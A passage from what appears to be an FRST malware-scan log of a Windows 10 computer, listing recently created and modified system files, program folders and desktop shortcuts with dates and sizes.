09:52 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll 2016-09-29 15:12 - 2016-09-15 09:52 - 00445952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprapi.dll 2016-09-29 15:12 - 2016-09-15 09:52 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe 2016-09-29 15:12 - 2016-09-15 09:51 - 00762368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll 2016-09-29 15:12 - 2016-09-15 09:50 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pwrshplugin.dll 2016-09-29 15:12 - 2016-09-15 09:49 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.InkControls.dll 2016-09-29 15:12 - 2016-09-15 09:48 - 01320448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll 2016-09-29 15:12 - 2016-09-15 09:46 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll 2016-09-29 15:12 - 2016-09-15 09:46 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.BackgroundMediaPlayback.dll 2016-09-29 15:12 - 2016-09-15 09:46 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll 2016-09-29 15:12 - 2016-09-15 09:45 - 02749440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll 2016-09-29 15:12 - 2016-09-15 09:45 - 00470016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.BackgroundMediaPlayer.dll 2016-09-29 15:12 - 2016-09-15 09:44 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll 2016-09-29 15:12 - 2016-09-15 09:44 - 00459776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.MediaPlayer.dll 2016-09-29 15:12 - 2016-09-15 09:44 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll 2016-09-29 15:12 - 2016-09-15 09:43 - 03520512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe 2016-09-29 15:12 - 2016-09-15 09:43 - 03196416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll 2016-09-29 15:12 - 2016-09-15 09:43 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll 2016-09-29 15:12 - 2016-09-15 09:43 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2016-09-29 15:12 - 2016-09-15 09:43 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll 2016-09-29 15:12 - 2016-09-15 09:42 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BackgroundMediaPolicy.dll 2016-09-29 15:12 - 2016-09-15 09:41 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll 2016-09-29 15:12 - 2016-09-15 09:41 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Geolocation.dll 2016-09-29 15:12 - 2016-09-15 09:41 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\unimdm.tsp 2016-09-29 15:12 - 2016-09-15 09:40 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll 2016-09-29 15:12 - 2016-09-15 09:40 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll 2016-09-29 15:12 - 2016-09-15 09:40 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll 2016-09-29 15:12 - 2016-09-15 09:40 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll 2016-09-29 15:12 - 2016-09-15 09:40 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll 2016-09-29 15:12 - 2016-09-15 09:40 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Background.SystemEventsBroker.dll 2016-09-29 15:12 - 2016-09-15 09:40 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll 2016-09-29 15:12 - 2016-09-15 09:39 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll 2016-09-29 15:12 - 2016-09-15 09:39 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll 2016-09-29 15:12 - 2016-09-15 09:39 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll 2016-09-29 15:12 - 2016-09-15 09:38 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe 2016-09-29 15:12 - 2016-09-15 09:38 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll 2016-09-29 15:12 - 2016-09-15 09:38 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmrdvcore.dll 2016-09-29 15:12 - 2016-09-15 09:38 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvcext.dll 2016-09-29 15:12 - 2016-09-15 09:38 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll 2016-09-29 15:12 - 2016-09-15 09:37 - 01507840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.FaceAnalysis.dll 2016-09-29 15:12 - 2016-09-15 09:37 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.dll 2016-09-29 15:12 - 2016-09-15 09:37 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlancfg.dll 2016-09-29 15:12 - 2016-09-15 09:37 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\biwinrt.dll 2016-09-29 15:12 - 2016-09-15 09:37 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll 2016-09-29 15:12 - 2016-09-15 09:36 - 00719360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys 2016-09-29 15:12 - 2016-09-15 09:36 - 00448512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll 2016-09-29 15:12 - 2016-09-15 09:36 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2016-09-29 15:12 - 2016-09-15 09:36 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll 2016-09-29 15:12 - 2016-09-15 09:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll 2016-09-29 15:12 - 2016-09-15 09:36 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll 2016-09-29 15:12 - 2016-09-15 09:35 - 00645120 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll 2016-09-29 15:12 - 2016-09-15 09:35 - 00472064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll 2016-09-29 15:12 - 2016-09-15 09:35 - 00432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll 2016-09-29 15:12 - 2016-09-15 09:35 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SessEnv.dll 2016-09-29 15:12 - 2016-09-15 09:35 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\rshx32.dll 2016-09-29 15:12 - 2016-09-15 09:34 - 00642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll 2016-09-29 15:12 - 2016-09-15 09:33 - 00966144 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbe.dll 2016-09-29 15:12 - 2016-09-15 09:33 - 00560128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll 2016-09-29 15:12 - 2016-09-15 09:31 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwrshplugin.dll 2016-09-29 15:12 - 2016-09-15 09:30 - 03776512 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll 2016-09-29 15:12 - 2016-09-15 09:30 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll 2016-09-29 15:12 - 2016-09-15 09:30 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys 2016-09-29 15:12 - 2016-09-15 09:30 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Energy.dll 2016-09-29 15:12 - 2016-09-15 09:29 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll 2016-09-29 15:12 - 2016-09-15 09:28 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll 2016-09-29 15:12 - 2016-09-15 09:27 - 00796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll 2016-09-29 15:12 - 2016-09-15 09:27 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAC3ENC.DLL 2016-09-29 15:12 - 2016-09-15 09:25 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll 2016-09-29 15:12 - 2016-09-15 09:25 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll 2016-09-29 15:12 - 2016-09-15 09:24 - 04596224 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe 2016-09-29 15:12 - 2016-09-15 09:24 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll 2016-09-29 15:12 - 2016-09-15 09:24 - 00538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll 2016-09-29 15:12 - 2016-09-15 09:24 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll 2016-09-29 15:12 - 2016-09-15 09:24 - 00139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll 2016-09-29 15:12 - 2016-09-15 09:23 - 01040896 _____ (Microsoft Corporation) C:\WINDOWS\system32\NaturalLanguage6.dll 2016-09-29 15:12 - 2016-09-15 09:23 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll 2016-09-29 15:12 - 2016-09-15 09:22 - 00857600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll 2016-09-29 15:12 - 2016-09-15 09:20 - 00875520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll 2016-09-29 15:12 - 2016-09-15 09:19 - 01424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll 2016-09-29 15:12 - 2016-09-15 09:17 - 00122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll 2016-09-29 15:12 - 2016-09-15 09:16 - 00886784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll 2016-09-29 15:12 - 2016-09-15 09:16 - 00531456 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll 2016-09-29 15:12 - 2016-08-05 20:33 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smphost.dll 2016-09-29 15:03 - 2016-10-17 21:03 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\777 2016-09-26 05:55 - 2016-09-26 05:55 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Captain Sim 2016-09-26 05:55 - 2016-09-26 05:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Captain Sim 2016-09-26 05:55 - 2016-09-26 05:55 - 00000000 ____D C:\Flight Simulator X Files 2016-09-26 05:41 - 2016-10-16 12:20 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\qBittorrent 2016-09-26 05:41 - 2016-09-26 05:41 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\qBittorrent 2016-09-26 05:41 - 2016-09-26 05:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent 2016-09-26 05:41 - 2016-09-26 05:41 - 00000000 ____D C:\Program Files (x86)\qBittorrent 2016-09-25 21:56 - 2016-09-25 21:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Universal Extractor 2016-09-25 21:56 - 2016-09-25 21:56 - 00000000 ____D C:\Program Files (x86)\Universal Extractor 2016-09-25 20:48 - 2016-10-20 15:01 - 00000000 ____D C:\ProgramData\Gramblr 2016-09-25 20:48 - 2016-10-18 19:40 - 00001015 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gramblr.lnk 2016-09-25 20:48 - 2016-10-13 14:48 - 00000000 ____D C:\Program Files\Gramblr 2016-09-25 19:12 - 2016-09-25 19:12 - 00000040 ___SH C:\WINDOWS\cnerolf.bin 2016-09-25 09:49 - 2016-09-25 09:49 - 00334616 _____ (Microsoft Corporation) C:\WINDOWS\system32\concrt140.dll 2016-09-25 09:49 - 2016-09-25 09:49 - 00089328 _____ (Microsoft Corporation) C:\WINDOWS\system32\vcruntime140.dll 2016-09-25 09:49 - 2016-09-25 09:49 - 00085744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vcruntime140.dll 2016-09-25 09:46 - 2016-09-25 09:46 - 00639728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp140.dll 2016-09-25 09:46 - 2016-09-25 09:46 - 00244504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\concrt140.dll 2016-09-25 09:45 - 2016-09-25 09:45 - 00443632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp140.dll 2016-09-25 09:45 - 2016-09-25 09:45 - 00394496 _____ (Microsoft Corporation) C:\WINDOWS\system32\vccorlib140.dll 2016-09-25 09:45 - 2016-09-25 09:45 - 00271104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vccorlib140.dll 2016-09-24 15:27 - 2016-09-24 15:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CaptainSim 757-200 PRO 2016-09-24 15:27 - 2016-09-24 15:27 - 00000000 ____D C:\Program Files\Microsoft Games 2016-09-20 19:47 - 2016-09-20 19:47 - 00002507 _____ C:\Users\Kyle Aniel\Desktop\Safari.lnk 2016-09-20 19:41 - 2016-10-18 19:40 - 00000726 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 10 Upgrade Assistant.lnk 2016-09-20 19:41 - 2016-10-18 19:38 - 00000726 _____ C:\Users\banie_000\Desktop\Windows 10 Upgrade Assistant.lnk 2016-09-20 19:41 - 2016-09-20 19:41 - 00000000 ____D C:\Windows10Upgrade ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-10-20 14:59 - 2016-09-16 04:16 - 00000000 ____D C:\Users\banie_000 2016-10-20 14:57 - 2016-09-16 04:09 - 00000000 ____D C:\WINDOWS\system32\SleepStudy 2016-10-20 06:44 - 2015-02-18 13:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Verizon 2016-10-20 05:17 - 2016-08-13 13:16 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Spotify 2016-10-20 05:17 - 2014-11-02 17:43 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Adobe 2016-10-20 05:16 - 2016-08-13 13:17 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Spotify 2016-10-20 05:15 - 2016-09-16 04:12 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2016-10-20 05:15 - 2014-11-01 19:56 - 00000000 __SHD C:\Users\Kyle Aniel\IntelGraphicsProfiles 2016-10-20 05:14 - 2016-09-16 04:53 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2016-10-20 05:14 - 2016-08-13 16:35 - 00000000 ____D C:\ProgramData\boost_interprocess 2016-10-19 15:04 - 2016-07-16 04:47 - 00000000 ___HD C:\Program Files\WindowsApps 2016-10-19 15:04 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\AppReadiness 2016-10-19 15:04 - 2014-11-01 19:56 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Packages 2016-10-19 06:56 - 2015-07-19 18:37 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Audacity 2016-10-19 05:01 - 2016-09-16 04:16 - 00000000 ____D C:\Users\Kyle Aniel 2016-10-18 23:55 - 2016-07-16 04:45 - 00000000 ____D C:\WINDOWS\INF 2016-10-18 23:53 - 2015-12-25 22:04 - 1317578402 _____ C:\WINDOWS\MEMORY.DMP 2016-10-18 20:55 - 2015-11-30 04:58 - 01824812 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2016-10-18 20:47 - 2016-07-15 23:04 - 01048576 _____ C:\WINDOWS\system32\config\BBI 2016-10-18 20:26 - 2015-10-05 15:21 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps 2016-10-18 19:51 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\addins 2016-10-18 19:40 - 2016-09-18 07:21 - 00002222 _____ C:\Users\Public\Desktop\Google Earth.lnk 2016-10-18 19:40 - 2016-09-16 04:35 - 00001564 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2016-10-18 19:40 - 2016-09-10 16:54 - 00002236 _____ C:\Users\Public\Desktop\Style Builder 2016.lnk 2016-10-18 19:40 - 2016-09-10 16:54 - 00002150 _____ C:\Users\Public\Desktop\LayOut 2016.lnk 2016-10-18 19:40 - 2016-09-10 16:54 - 00002061 _____ C:\Users\Public\Desktop\SketchUp 2016.lnk 2016-10-18 19:40 - 2016-09-04 15:17 - 00001310 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk 2016-10-18 19:40 - 2016-09-04 15:13 - 00001416 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Character Animator (Preview).lnk 2016-10-18 19:40 - 2016-09-04 14:16 - 00001610 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Application Manager.lnk 2016-10-18 19:40 - 2016-09-04 14:16 - 00001604 _____ C:\Users\Public\Desktop\Adobe Application Manager.lnk 2016-10-18 19:40 - 2016-08-04 19:11 - 00002653 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EditVoicepack X.lnk 2016-10-18 19:40 - 2016-07-29 22:39 - 00000978 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.lnk 2016-10-18 19:40 - 2016-07-12 12:13 - 00002507 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safari.lnk 2016-10-18 19:40 - 2016-07-12 12:13 - 00002501 _____ C:\Users\Public\Desktop\Safari.lnk 2016-10-18 19:40 - 2016-06-08 08:09 - 00000957 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\paint.net.lnk 2016-10-18 19:40 - 2016-06-08 08:09 - 00000951 _____ C:\Users\Public\Desktop\paint.net.lnk 2016-10-18 19:40 - 2016-05-07 07:07 - 00001045 _____ C:\Users\Public\Desktop\WinRAR.lnk 2016-10-18 19:40 - 2016-05-06 20:00 - 00001092 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenShot Video Editor.lnk 2016-10-18 19:40 - 2016-04-07 19:48 - 00001823 _____ C:\Users\Public\Desktop\iTunes.lnk 2016-10-18 19:40 - 2016-03-11 22:17 - 00002615 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SBACSecureBrowser.lnk 2016-10-18 19:40 - 2016-03-11 22:17 - 00002609 _____ C:\Users\Public\Desktop\SBACSecureBrowser.lnk 2016-10-18 19:40 - 2016-02-13 07:26 - 00001223 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2016-10-18 19:40 - 2016-02-13 07:26 - 00001217 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2016-10-18 19:40 - 2015-12-29 13:47 - 00002267 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2016-10-18 19:40 - 2015-12-29 13:47 - 00002261 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2016-10-18 19:40 - 2015-12-28 22:04 - 00001083 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audacity.lnk 2016-10-18 19:40 - 2015-12-28 22:04 - 00001077 _____ C:\Users\Public\Desktop\Audacity.lnk 2016-10-18 19:40 - 2015-12-09 20:31 - 00000908 _____ C:\Users\Public\Desktop\CCleaner.lnk 2016-10-18 19:40 - 2015-12-06 16:24 - 00001977 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Synthesia.lnk 2016-10-18 19:40 - 2015-12-06 16:24 - 00001971 _____ C:\Users\Public\Desktop\Synthesia.lnk 2016-10-18 19:40 - 2015-11-21 10:00 - 00002607 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CASecureBrowser.lnk 2016-10-18 19:40 - 2015-10-24 17:16 - 00002488 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk 2016-10-18 19:40 - 2015-10-24 17:16 - 00002487 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk 2016-10-18 19:40 - 2015-10-24 17:16 - 00002450 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk 2016-10-18 19:40 - 2015-10-24 17:16 - 00002430 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk 2016-10-18 19:40 - 2015-09-21 13:38 - 00002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk 2016-10-18 19:40 - 2015-09-21 13:38 - 00002125 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk 2016-10-18 19:40 - 2015-07-24 07:52 - 00001869 _____ C:\Users\Public\Desktop\McAfee Security Center.lnk 2016-10-18 19:40 - 2015-02-18 01:10 - 00001098 _____ C:\Users\Public\Desktop\Vz In-Home Agent.lnk 2016-10-18 19:40 - 2015-02-01 21:00 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk 2016-10-18 19:40 - 2014-11-01 17:50 - 00002497 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Messenger.lnk 2016-10-18 19:40 - 2014-11-01 17:50 - 00001469 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Mail.lnk 2016-10-18 19:40 - 2014-11-01 17:50 - 00001385 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk 2016-10-18 19:40 - 2014-11-01 17:50 - 00001316 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk 2016-10-18 19:38 - 2016-09-02 21:36 - 00001164 _____ C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IcoFX 2.lnk 2016-10-18 19:38 - 2016-08-22 18:30 - 00001107 _____ C:\Users\banie_000\Desktop\MidiEditor.lnk 2016-10-18 19:38 - 2016-08-13 15:12 - 00002196 _____ C:\Users\banie_000\Desktop\Wirecast.lnk 2016-10-18 19:38 - 2016-08-05 10:52 - 00001326 _____ C:\Users\banie_000\Desktop\Voice Changer 9.0 Diamond.lnk 2016-10-18 19:38 - 2016-07-29 23:31 - 00001933 _____ C:\Users\banie_000\Desktop\ADE 170.lnk 2016-10-18 19:38 - 2016-07-20 12:20 - 00002056 _____ C:\Users\banie_000\Desktop\767-300 FSX Configuration Manager.lnk 2016-10-18 19:38 - 2016-07-05 19:10 - 00001011 _____ C:\Users\banie_000\Desktop\Open Broadcaster Software.lnk 2016-10-18 19:38 - 2016-06-08 08:03 - 00001985 _____ C:\Users\banie_000\Desktop\DXTBmp.lnk 2016-10-18 19:38 - 2015-11-13 21:32 - 00001291 _____ C:\Users\banie_000\Desktop\video-editor_setup_full1107(1).exe.lnk 2016-10-18 19:38 - 2015-11-13 20:43 - 00001301 _____ C:\Users\banie_000\Desktop\video-editor-idco_setup_full1107.exe.lnk 2016-10-18 19:38 - 2015-11-13 20:00 - 00001276 _____ C:\Users\banie_000\Desktop\video-editor_setup_full1107.exe.lnk 2016-10-18 19:38 - 2015-08-29 09:54 - 00002391 _____ C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2016-10-18 18:35 - 2016-08-16 13:16 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Flight Simulator X Files 2016-10-18 18:35 - 2016-08-04 21:03 - 00000000 ____D C:\Program Files (x86)\FS Recorder for FSX 2016-10-17 17:29 - 2016-04-05 18:54 - 00000000 ____D C:\ProgramData\BlueStacksSetup 2016-10-17 15:23 - 2016-07-16 04:36 - 00000000 ____D C:\WINDOWS\CbsTemp 2016-10-16 22:25 - 2016-09-04 15:19 - 00001531 _____ C:\Users\Kyle Aniel\Desktop\AfterFX.exe - Shortcut.lnk 2016-10-16 22:25 - 2016-08-28 12:55 - 00002885 _____ C:\Users\Kyle Aniel\Desktop\Microsoft Flight Simulator X.lnk 2016-10-16 22:25 - 2016-07-15 20:52 - 00001164 _____ C:\Users\Kyle Aniel\Desktop\Microsoft Expression Encoder 4.lnk 2016-10-16 22:25 - 2016-07-15 20:51 - 00001201 _____ C:\Users\Kyle Aniel\Desktop\Microsoft Expression Encoder 4 Screen Capture.lnk 2016-10-16 22:25 - 2016-07-05 10:26 - 00001255 _____ C:\Users\Kyle Aniel\Desktop\HitFilm 4 Express.lnk 2016-10-16 22:25 - 2016-03-15 16:32 - 00001521 _____ C:\Users\Kyle Aniel\Desktop\DVDMaker.lnk 2016-10-16 22:25 - 2015-12-09 20:39 - 00001892 _____ C:\Users\Kyle Aniel\Desktop\PowerPoint 2016.lnk 2016-10-16 22:25 - 2015-12-09 20:39 - 00001877 _____ C:\Users\Kyle Aniel\Desktop\Word 2016.lnk 2016-10-16 16:58 - 2016-07-16 04:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2016-10-16 16:57 - 2014-07-16 23:41 - 00000000 ____D C:\Program Files (x86)\Microsoft Office 2016-10-16 06:22 - 2014-12-07 21:10 - 00000364 _____ C:\WINDOWS\Tasks\HPCeeScheduleForKYLE-PC$.job 2016-10-15 20:10 - 2016-09-16 04:53 - 00003284 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForKYLE-PC$ 2016-10-15 19:02 - 2015-05-01 14:58 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Screencast-O-Matic 2016-10-15 17:03 - 2014-12-22 16:56 - 00000000 ____D C:\Users\Kyle Aniel\.VirtualBox 2016-10-15 17:01 - 2015-01-10 11:00 - 00000000 ____D C:\Users\Kyle Aniel\VirtualBox VMs 2016-10-15 08:13 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\rescache 2016-10-14 23:19 - 2016-02-03 21:37 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Kyle Laptop 2-3-16 2016-10-14 21:22 - 2016-07-15 23:04 - 00008192 _____ C:\WINDOWS\system32\config\ELAM 2016-10-14 19:06 - 2014-11-01 19:52 - 00000000 __RHD C:\Users\Public\AccountPictures 2016-10-14 19:03 - 2016-09-16 04:09 - 04981224 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ___SD C:\WINDOWS\system32\DiagSvcs 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\migwiz 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\ShellExperiences 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2016-10-13 21:06 - 2016-02-09 18:34 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Sound recordings 2016-10-13 17:02 - 2016-07-29 22:40 - 00000000 ____D C:\Users\Kyle Aniel\.gimp-2.8 2016-10-13 16:53 - 2015-12-24 21:16 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons 2016-10-13 15:53 - 2014-11-06 00:12 - 00000000 ____D C:\WINDOWS\system32\MRT 2016-10-13 15:40 - 2014-11-06 00:12 - 143495576 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2016-10-13 15:07 - 2016-07-16 04:43 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll 2016-10-13 15:07 - 2016-07-16 04:42 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll 2016-10-13 15:00 - 2016-09-16 04:53 